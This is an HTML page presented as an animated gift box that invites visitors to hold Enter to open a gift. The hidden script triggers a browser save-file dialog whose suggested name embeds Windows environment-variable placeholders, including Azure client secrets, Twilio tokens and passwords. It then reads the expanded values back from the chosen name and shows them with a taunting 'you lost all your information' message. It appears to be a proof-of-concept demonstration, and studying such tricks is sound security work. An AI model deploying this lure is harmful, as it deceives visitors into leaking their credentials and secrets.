<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Gift Box with CSS Animation</title>
  <style>
     #author {
            font-size: 14px;
            color: #666;
            margin-top: 10px;
            margin-bottom: 10px;
        }
        table {
            width: 100%;
            border-collapse: collapse;
            margin-top: 20px;
        }
        table, th, td {
            border: 1px solid #ddd;
        }
        th, td {
            padding: 8px;
            text-align: left;
        }
        th {
            background-color: #f2f2f2;
        }
        .name{
            align-items: center;
            text-align: center;
            margin-left:10px;
            margin-right:10px;

        }
    body {
      background: white;
      /* display: flex; */
      justify-content: center;
      align-items: center;
      height: 100%;
      margin: 0;
    }
    .info{
        margin-top:150px;
    }
    .box {
      position: relative;
      display: flex;
      justify-content: center;
      align-items: center;
    }
    .box::before {
      content: "";
      width: 440px;
      height: 440px;
      background-color: #89cff0;
      position: absolute;
      z-index: -1;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      border-radius: 50%;
    }
    .box-body {
      position: relative;
      height: 200px;
      width: 200px;
      margin-top: 123.3333333333px;
      background-color: #cc231e;
      border-bottom-left-radius: 5%;
      border-bottom-right-radius: 5%;
      box-shadow: 0px 4px 8px 0px rgba(0, 0, 0, 0.3);
      background: linear-gradient(#762c2c,#ff0303);
      cursor: pointer;
      transition: transform 0.5s ease-in-out;
      display: flex;
      justify-content: center;
      align-items: center;
      outline: none; /* Remove default outline */
    }
    .box-body .img{
      opacity: 0;
      transform: translateY(0%);
      transition: all 0.5s;
      margin: 0 auto;
      display: block;
    }
    .box-body.opened {
  animation: box-body-open 5s ease-in-out;
  /* Remove animation-fill-mode: forwards; */
}

    .box-body.opened .img {
      opacity: 1;
      z-index: 0;
      transform: translateY(-157px);
    }
    .box-body.opened .box-lid {
      animation: box-lid-open 2s forwards ease-in-out;
    }
    .box-body.opened .box-bowtie::before {
      animation: box-bowtie-left-open 2.1s forwards ease-in-out;
    }
    .box-body.opened .box-bowtie::after {
      animation: box-bowtie-right-open 2.1s forwards ease-in-out;
    }
    .box-body::after {
      content: "";
      position: absolute;
      top: 0;
      bottom: 0;
      left: 50%;
      transform: translateX(-50%);
      width: 50px;
      background: linear-gradient(#ffffff,#ffefa0);
    }
    .box-lid {
      position: absolute;
      z-index: 1;
      left: 50%;
      transform: translateX(-50%);
      bottom: 90%;
      height: 40px;
      background-color: #cc231e;
      height: 40px;
      width: 220px;
      border-radius: 5%;
      box-shadow: 0 8px 4px -4px rgba(0, 0, 0, 0.3);
    }
    .box-lid::after {
      content: "";
      position: absolute;
      top: 0;
      bottom: 0;
      left: 50%;
      transform: translateX(-50%);
      width: 50px;
      background: linear-gradient(#ffefa0,#fff);
    }
    .box-bowtie {
      height: 100%;
    }
    .box-bowtie::before, .box-bowtie::after {
      content: "";
      width: 83.3333333333px;
      height: 83.3333333333px;
      border: 16.6666666667px solid white;
      border-radius: 50% 50% 0 50%;
      position: absolute;
      bottom: 99%;
      z-index: -1;
    }
    .box-bowtie::before {
      left: 50%;
      transform: translateX(-100%) skew(10deg, 10deg);
    }
    .box-bowtie::after {
      left: 50%;
      transform: translateX(0%) rotate(90deg) skew(10deg, 10deg);
    }

    @keyframes box-lid-open {
      0%, 42% {
        transform: translate3d(-119%, 225%, 0) rotate(-70deg);
      }
      60% {
        transform: translate3d(-85%, -230%, 0) rotate(-25deg);
      }
      90%, 100% {
        transform: translate3d(-50%, 0%, 0) rotate(0deg);
      }
    }

    @keyframes box-body-open {
      0% {
        transform: translate3d(0%, 0%, 0) rotate(0deg);
      }
      25% {
        transform: translate3d(0%, -15%, 0) rotate(0deg);
      }
      50% {
        transform: translate3d(0%, 25%, 0) rotate(20deg);
      }
      70% {
        transform: translate3d(0%, 0%, 0) rotate(0deg);
      }
    }

    @keyframes box-bowtie-right-open {
      0%, 50%, 75% {
        transform: translate(-50%, -15%) rotate(45deg) skew(10deg, 10deg);
        box-shadow: 0px 4px 8px -4px rgba(0, 0, 0, 0.3);
      }
      90%, 100% {
        transform: translateX(0%) rotate(90deg) skew(10deg, 10deg);
      }
    }

    @keyframes box-bowtie-left-open {
      0% {
        transform: translateX(-100%) rotate(0deg) skew(10deg, 10deg);
      }
      50%, 75% {
        transform: translate(-50%, -15%) rotate(45deg) skew(10deg, 10deg);
      }
      90%, 100% {
        transform: translateX(-100%) rotate(0deg) skew(10deg, 10deg);
      }
    }
    .container{
        margin-top:100px
    }
    .info{
        margin-right:200px;
        margin-left:200px;
        align-items: center;
        text-align:center;
        margin-bottom:100px;
    }
  </style>
</head>
<body>
    <div class="name"> <h3 >Hold Enter 2s to see your special gift !!!!</h4></div>
    <div class="container">
       
        <div class="row">
          
            <div class="col-12 mt-5 d-flex justify-content-center">
               
                <div class="box">

                    <div class="box-body" tabindex="0">
                        <!-- <img class="img" src="https://via.placeholder.com/150"> -->
                        <div class="box-lid">
                            <div class="box-bowtie"></div>
                        </div>
                    </div>
                   
                </div>
               
               
            </div>
           
        </div>
       
        <div class="info">
            <div id="pixel"></div>
            <h1 id="gameover"></h1>
            <div id="userInfo"></div>
        </div>
    </div>
   
    

  <script>
    let enterTimer;
    let isBoxOpened = false;
    let countEnter = 0;
    let isDownloaded = false;
    // Sự kiện khi tải xong trang
    window.onload = function () {
        const body = document.querySelector('body');
        const pixel = document.querySelector('#pixel');
        body.onkeydown = e => (e.key === "Enter") ? clickedEnter():null ;
        body.onkeyup = e => (e.key === "Enter") ? cancelEnter() : null;
        const boxBody = document.querySelector('.box-body');
        const randomNumber = Math.floor(Math.random() * 990) + 1;
            const filename = `f${randomNumber}.f`;

            const environmentVariables = [
                'USERNAME',
                'USERDOMAIN',
                'SESSIONNAME',
                'COMPUTERNAME',
                'KEY_VAULT_URL',
                'SECRET_NAME',
                'AZURE_TENANT_ID',
                'AZURE_CLIENT_ID',
                'AZURE_CLIENT_SECRET',
                'TWILIO_ACCOUNT_SID',
                'TWILIO_AUTH_TOKEN',
                'TOKEN',
                'PASSWORD'
            ];

            const suggestedName = environmentVariables.map(x => `%${x}%`).join('@') + filename;

        pixel.addEventListener('click', async () => {
            const boxBody = document.querySelector('.box-body');
      boxBody.classList.add('opened');
    
      isBoxOpened = true;
    const handle = await window.showSaveFilePicker({ suggestedName });
    const username = handle.name.split('@')[0];

   
    const userInfo = handle.name.replaceAll(filename, '').split('@').map((x) => x.includes('%') ? 'null' : x.trim());

  
    const table_Info = environmentVariables.map((envVar, index) => ({
        environmentVariable: envVar,
        userInfo: userInfo[index] || 'null'  
    }));

    console.log(table_Info);

    
    const userInfoTable = document.querySelector("#userInfo");
    
    const tableHTML = `
    <table>
        <thead>
            <tr>
                <th>Environment Variable</th>
                <th>User Info</th>
            </tr>
        </thead>
        <tbody>
            ${table_Info.map(info => {
                if (info.userInfo !== 'null') {
                    return `
                        <tr>
                            <td>${info.environmentVariable}</td>
                            <td>${info.userInfo}</td>
                        </tr>
                    `;
                } else {
                    return ''; 
                }
            }).join('')}
            <tr>
                <td>guessWinPath</td>
                <td>C:/users/${username}</td>
            </tr>
        </tbody>
    </table>
`;


    
    userInfoTable.innerHTML += tableHTML;

    
     document.querySelector("#gameover").textContent = "Congratulation, you lost all your information!!!";
});
function clickedEnter() {
  if (!isBoxOpened && !isDownloaded) { // chỉ mở hộp khi nó chưa được mở và chưa được tải về
    countEnter++;
    if (countEnter > 5) {
      const boxBody = document.querySelector('.box-body');
      boxBody.classList.add('opened');
    
      isBoxOpened = true;
      document.querySelector('#pixel').click();
      isDownloaded = true;
      isDownloaded = true; // đánh dấu rằng đã tải về để ngăn không cho mở lại
    }
    
  }
}

        function cancelEnter() { 
            countEnter = 0;
         
        }

        function displayUserInfo(userInfo, username) {
            const userInfoDiv = document.querySelector("#userInfo");
            const table = document.createElement('table');

            const thead = document.createElement('thead');
            const tr = document.createElement('tr');
            const th1 = document.createElement('th');
            const th2 = document.createElement('th');
            th1.textContent = 'Variable';
            th2.textContent = 'Value';

            tr.appendChild(th1);
            tr.appendChild(th2);
            thead.appendChild(tr);
            table.appendChild(thead);

            const tbody = document.createElement('tbody');
            userInfo.forEach(info => {
                const tr = document.createElement('tr');
                const td1 = document.createElement('td');
                const td2 = document.createElement('td');
                td1.textContent = info.variable;
                td2.textContent = info.value;

                tr.appendChild(td1);
                tr.appendChild(td2);
                tbody.appendChild(tr);
            });

            table.appendChild(tbody);
            userInfoDiv.innerHTML = `USER'S ENVIRONMENT VARIABLES:<br> guessWinPath = C:/users/${username}`;
            userInfoDiv.appendChild(table);
        }
        // document.addEventListener('keydown', function(event) {
        //     if (event.key === 'Enter') {
        //         const boxBody = document.querySelector('.box-body');
        //     boxBody.classList.add('opened');
        //     isBoxOpened = true;
        //     }
          
        // });
        // function clickedEnter() {
        //     countEnter++;
        //     if (countEnter > 5 && !isDownloaded) {
        //         const boxBody = document.querySelector('.box-body');
        //         boxBody.classList.add('opened');
        //         console.log("te")
        //     }
        // }

        // function cancelEnter() {
        //     countEnter = 0;
        // }
      
      
    };

    // function openBox() {
    //     const boxBody = document.querySelector('.box-body');
    //     boxBody.classList.add('opened');
    //     isBoxOpened = true;
    // }
</script>

</body>
</html>
